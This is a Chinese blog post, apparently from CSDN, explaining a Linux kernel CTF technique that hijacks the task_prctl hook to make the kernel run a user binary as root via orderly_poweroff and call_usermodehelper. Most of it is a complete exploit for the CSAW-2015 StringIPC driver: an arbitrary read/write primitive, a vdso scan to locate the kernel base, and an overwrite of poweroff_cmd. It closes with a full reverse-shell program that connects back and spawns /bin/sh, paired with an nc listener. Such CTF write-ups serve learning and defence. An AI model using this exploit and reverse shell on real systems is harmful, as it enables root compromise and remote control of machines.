linux kernel pwn学习之hijack prctl

最新推荐文章于 2023-09-16 19:09:12 发布
最新推荐文章于 2023-09-16 19:09:12 发布
阅读量1.6k 收藏 3
点赞数 3
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 Kernel Exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104695399
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Hijack prctl

Prctl是linux的一个函数,可以对进程、线程做一些设置,prctl内部通过虚表来调用对应的功能,如果我们劫持prctl的虚表,使它指向其他对我们有帮助的内核函数,比如call_usermodehelper函数,该函数执行一个用户传入的二进制文件,且以root权限执行,由此可以利用起来提权。

我们分析一下prctl源码,在linux/kernel/sys.c里,我们看到这

我们继续跟进,查看security_task_prctl函数,在linux/security/security.c文件里找到

函数调用了task_prctl表里的函数,因此,如果我们劫持task_prctl表,就能通过执行prctl来执行我们想要的函数,比如call_usermodehelper函数。为了确定我们该劫持的表的地址,我们先写一个小demo.c

  1. #include <sys/prctl.h>  
  2.   
  3. int main() {  
  4.    prctl(0,0);  
  5. }  

然后,编译,放到系统里,我们先查看一下security_task_prctl函数的地址

接下来,我们用gdb在这里断点,然后运行我们的demo程序

成功断点

继续单步运行,到这里

从而,我们确定了task_prctl表的地址,减去内核基地址,我们就能确定task_prctl的偏移了。在这里,我们得到的是偏移是0xeb8118。

有一点不幸的是, 传入security_task_prctl函数的第一个参数被截断了,这意味着,如果我们task_prctl劫持为call_usermodehelper,在64位下不能完成利用。

因为call_usermodehelper函数的第一个参数是一个字符串地址

为了解决这个问题,我们可以借鉴一下glibc下劫持为one_gadget的思想,我们来搜索一下有没有类似的one_gadget可以使用。我们在内核源码里搜索哪些函数调用了call_usermodehelper函数。

我们发现mce_do_trigger函数可以用,它调用call_usermodehelper函数的前两个参数来自全局数据段,或许可以被我们劫持修改

我们有找到几个合适的

其中run_cmd调用了call_usermodehelper函数。由此,我们只需要把prctl_task劫持到这几个函数,比如__orderly_poweroff,然后篡改poweroff_cmd为我们需要执行的二进制文件路径。接着调用prctl,就会以root权限执行我们的二进制文件,从而提权。我们可以执行一个反弹shell的程序,然后用nc来连接。

为了实现上述目标,我们首先需要得到内核基址,之前,我在https://blog.csdn.net/seaaseesa/article/details/104694219这篇博客里讲到了劫持vdso,我们同样需要利用一下,我们计算出了vdso的地址后,就能算出内核的基址,因为它们之间的差值是不变的。

我们以CSAW-2015-StringIPC为例,它的exploit.c如下

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/time.h>
#include <sys/auxv.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8
//poweroff字符串的偏移
#define POWEROFF_CMD 0xE4DFA0
//orderly_poweroff函数的偏移
#define ORDERLY_POWEROFF 0x9c950
//task_prctl的偏移
#define TASK_PRCTL 0xeb8118;

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

void errExit(char *msg) {
   puts(msg);
   exit(-1);
}
//驱动的文件描述符
int fd;
//初始化驱动
void initFD() {
   fd = open("/dev/csaw",O_RDWR);
   if (fd < 0) {
      errExit("[-] open file error!!");
   }
}

//申请一个channel,返回id
int alloc_channel(size_t size) {
   struct alloc_channel_args args;
   args.buf_size = size;
   args.id = -1;
   ioctl(fd,CSAW_ALLOC_CHANNEL,&args);
   if (args.id == -1) {
      errExit("[-]alloc_channel error!!");
   }
   return args.id;
}

//改变channel的大小
void shrink_channel(int id,size_t size) {
   struct shrink_channel_args args;
   args.id = id;
   args.size = size;
   ioctl(fd,CSAW_SHRINK_CHANNEL,&args);
}
//seek
void seek_channel(int id,loff_t offset,int whence) {
   struct seek_channel_args args;
   args.id = id;
   args.index = offset;
   args.whence = whence;
   ioctl(fd,CSAW_SEEK_CHANNEL,&args);
}
//读取数据
void read_channel(int id,char *buf,size_t count) {
   struct read_channel_args args;
   args.id = id;
   args.buf = buf;
   args.count = count;
   ioctl(fd,CSAW_READ_CHANNEL,&args);
}
//写数据
void write_channel(int id,char *buf,size_t count) {
   struct write_channel_args args;
   args.id = id;
   args.buf = buf;
   args.count = count;
   ioctl(fd,CSAW_WRITE_CHANNEL,&args);
}
//任意地址读
void arbitrary_read(int id,char *buf,size_t addr,size_t count) {
   seek_channel(id,addr-0x10,SEEK_SET);
   read_channel(id,buf,count);
}
//任意地址写
//由于题目中使用了strncpy_from_user,遇到0就会截断,因此,我们逐字节写入
void arbitrary_write(int id,char *buf,size_t addr,size_t count) {
   for (int i=0;i<count;i++) {
      seek_channel(id,addr+i-0x10,SEEK_SET);
      write_channel(id,buf+i,1);
   }
}
//获取vdso里的字符串"gettimeofday"相对vdso.so的偏移
int get_gettimeofday_str_offset() {
   //获取当前程序的vdso.so加载地址0x7ffxxxxxxxx
   size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
   char* name = "gettimeofday";
   if (!vdso_addr) {
      errExit("[-]error get name's offset");
   }
   //仅需要搜索1页大小即可,因为vdso映射就一页0x1000
   size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));
   if (name_addr < 0) {
      errExit("[-]error get name's offset");
   }
   return name_addr - vdso_addr;
}

int main() {
   char *buf = (char *)calloc(1,0x1000);
   initFD();
   //申请一个channel,大小0x100
   int id = alloc_channel(0x100);
   //改变channel大小,形成漏洞,实现任意地址读写
   shrink_channel(id,0x101);
   //获取gettimeofday字符串在vdso.so里的偏移
   int gettimeofday_str_offset = get_gettimeofday_str_offset();
   printf("gettimeofday str in vdso.so offset=0x%x\n",gettimeofday_str_offset);
   size_t vdso_addr = -1;
   for (size_t addr=0xffffffff80000000;addr < 0xffffffffffffefff;addr += 0x1000) {
      //读取一页数据
      arbitrary_read(id,buf,addr,0x1000);
      //如果在对应的偏移处,正好是这个字符串,那么我们就能确定当前就是vdso的地址
      //之所以能确定,是因为我们每次读取了0x1000字节数据,也就是1页,而vdso的映射也只是1页
      if (!strcmp(buf+gettimeofday_str_offset,"gettimeofday")) {
         printf("[+]find vdso.so!!\n");
         vdso_addr = addr;
         printf("[+]vdso in kernel addr=0x%lx\n",vdso_addr);
         break;
      }
   }
   if (vdso_addr == -1) {
      errExit("[-]can't find vdso.so!!");
   }
   //计算出kernel基地址
   size_t kernel_base = vdso_addr & 0xffffffffff000000;
   printf("[+]kernel_base=0x%lx\n",kernel_base);
   size_t poweroff_cmd_addr = kernel_base + POWEROFF_CMD;
   printf("[+]poweroff_cmd_addr=0x%lx\n",poweroff_cmd_addr);
   size_t orderly_poweroff_addr = kernel_base + ORDERLY_POWEROFF;
   printf("[+]poweroff_cmd_addr=0x%lx\n",orderly_poweroff_addr);
   size_t task_prctl_addr = kernel_base + TASK_PRCTL;
   printf("[+]task_prctl_addr=0x%lx\n",task_prctl_addr);
   //反弹shell,执行的二进制文件,由call_usermodehelper来执行,自带root
   char reverse_command[] = "/reverse_shell";
   //修改poweroff_cmd_addr处的字符串为我们需要执行的二进制文件的路径
   arbitrary_write(id,reverse_command,poweroff_cmd_addr,strlen(reverse_command));
   //hijack prctl,使得task_prctl指向orderly_poweroff函数
   arbitrary_write(id,&orderly_poweroff_addr,task_prctl_addr,8);
   if (fork() == 0) { //fork一个子进程,来触发shell的反弹
      prctl(0,0);
      exit(-1);
   } else {
      printf("[+]open a shell\n");
      system("nc -lvnp 7777");
   }

   return 0;
}

而qwb2018-solid_core同样,也是这个解法,稍作一下修改即可。反弹shell的程序如下

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include <fcntl.h> 
#include <unistd.h>

char server_ip[]="127.0.0.1";
uint32_t server_port=7777;

int main() 
{
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in attacker_addr = {0};
    attacker_addr.sin_family = AF_INET;
    attacker_addr.sin_port = htons(server_port);
    attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
    while(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0);
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    system("/bin/sh");
}

 

ha1vk
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6377
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
rk3288-8.1-call_usermodehelpere();
longmin96的博客
12-09 203
rk3288-8.1-call_usermodehelpere
call_usermodehelper函数分析
Jahol_Fan的博客
11-07 3712
 内核中的call_usermodehelper函数可以实现在内核空间调用用户空间的应用程序。 在linux内核中,实现关机的接口:__orderly_poweroff,该接口的主要作用是:在内核空间,调用用户空间的应用程序“/sbin/poweroff”,达到关机的目的。通过调该接口,可以实现在内核中实现“长按关机”操作。 char poweroff_cmd[POWEROFF_CMD_P...
exynos5410 TMU系统的critical情况处理方法
shichaog的专栏
12-16 1906
根据TMU,将CPU的温升分为四种情况来处理,分别是下述情况:THERMAL_TRIP_HOT THERMAL_TRIP_ACTIVE THERMAL_TRIP_PASSIVE THERMAL_TRIP_CRITICAL THERMAL_TRIP_HOT只是简单的调用该平台实现的notify函数即可。 THERMAL_TRIP_ACTIVE是主动降频, THERMAL_TRIP_PASSIV
[PWN]pwnable_orw prctl()函数
LDX的博客
09-16 155
BUUCTF pwn prctl-seccomp
关于linux内核的漏洞,【Linux内核漏洞利用】绕过内核SMEP姿势总结与实践
weixin_35695430的博客
05-10 575
一、通过VDSO绕过PXN1.简介最近一年,一种利用VDSO( Virtual Dynamic Shared Object,虚拟动态共享对象)机制的攻击方式,在脏牛等漏洞利用代码中得到应用。用这种方式提权更加稳定,绕过PXN让内核执行shellcode,而ROP方式总是要在不同设备版本中做适配。PXN( PrivilegedExecute-Never)/SMEP主要是防御ret2usr攻击,它的开...
Linux中的SetUid和capability权能机制
zhaominyong的专栏
02-22 1301
Linux中的SetUid和capability权能机制
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
Pwn学习路线及学习笔记以及gem安装
10-15
《汇编语言》是Pwn学习的必备知识之一。作者建议从王爽老师的《汇编语言》开始,通过学习汇编语言来了解计算机内部的运行机理。汇编语言可以使大家更加深入地了解计算机内部到底是怎样运行的,并且可以学习到很多有...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
02-linux pwn入门学习到放弃.pdf
09-20
02-linux pwn入门学习到放弃.pdf
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞
linux kernal pwn 2018强网杯 solid_core
yongbaoii的博客
04-17 218
整个应该从CSAW 2015 stringipc来看 这道core看起来似乎跟上面那个stringipc是一模一样 但是总会有不同 区别就首先不让读写0xffffffff80000000往前的地址 这直接导致我们不能覆写cred 上次的第一个思路就没了 然后它又用的是最新的内核 新的内核中专门对劫持vdso的攻击手段 所以要介绍一个新的思路 劫持prctl函数,它能够让我们从局部地址读写一直到任意代码执行 prctl有5个参数,prctl将参数原封不动传给了security_task_prctl函数去处理
pwn入门小技巧
qq_36918532的博客
05-24 2671
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
prctl()函数应用
thinkinwm的专栏
03-25 2506
int prctl(int option,unsigned longarg2,unsigned long arg3,unsigned long arg4,unsigned long arg5) 这个系统调用指令是为进程制定而设计的,明确的选择取决于option: PR_GET_PDEATHSIG :返回处理器信号;   PR_SET_PDEATHSIG :arg2作为处理器
prctl给线程命名
Tyrion Lannister's Special column
02-17 1706
对于多线程应用程序,如果能够给每个线程命名,那么调试起来的便利是不言而喻的。       可以用prctl给进程内其它线程命名的接口,测试代码如下: #include #include #include #include void* pFunc(void *arg) {     char name[32];     prctl(PR_SET_NAM
函数 prctl 系统调用
lvxu666的博客
05-23 2971
是一个系统调用,用于控制和修改进程的行为和属性。它可以在Linux系统上使用,提供了各种功能和选项来管理进程的不同方面。每个选项都有特定的参数,可以根据需要传递。具体的参数和行为取决于所选的选项。函数将当前进程的名称设置为"MyProcess"。函数时,应该查阅相关文档并了解所使用的操作系统的支持和限制。函数的具体行为和可用选项可能因操作系统和版本而异。选项和参数,用于执行不同的操作。函数获取进程的名称,并将其打印到标准输出。以下是一个简单的示例,展示了如何使用。这些仅是一些常用的选项,
prctl()函数详解
CodeAllen嵌入式
09-23 920
越过当设置文件的S_ISUID和S_ISGID位的时候,用户的ID必须和所有者ID匹配的限制,设置S-ISGID位的时候,组ID。如果_POSIX_ACL定义,就会越过所有的DAC访问,包括ACL执行访问,用CAP_LINUX_IMMUTABLE功能来排除。EINVAL————option的值不正确,或者当它是PR_SET_PDEATHSIG时,参数arg2的值不是0或者信号数字。(Since Linux2.6.9)必须和所有者ID匹配的限制,用chown来设置S_ISUID和S_ISGID为的功能限制。
linux如何安装pwn
最新发布
05-08
Pwn是一种利用程序漏洞来攻击目标程序的技术,而Linux系统是Pwn比赛中最常用的系统。要在Linux系统上安装Pwn,可以按照以下步骤进行操作: 1.安装Pwn工具包:Pwn工具包是一些常用的Pwn工具的集合,包括GDB、IDA等。在Linux系统上可以使用以下命令安装:sudo apt-get install gdb gcc gcc-multilib libc6-dev-i386 python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential 2.安装Pwntools:Pwntools是一个方便的Python库,可以用于编写Pwn脚本。在Linux系统上可以使用以下命令安装:sudo pip install pwntools 3.准备目标程序:在Pwn比赛中,会提供一些可执行文件或者二进制文件作为目标程序。可以从CTF比赛平台上下载并保存在本地。 4.编写Pwn脚本:使用Pwntools编写Pwn脚本来攻击目标程序。脚本可以利用漏洞实现对程序的控制、提取数据等操作。 5.运行攻击脚本:运行编写好的Pwn脚本即可攻击目标程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值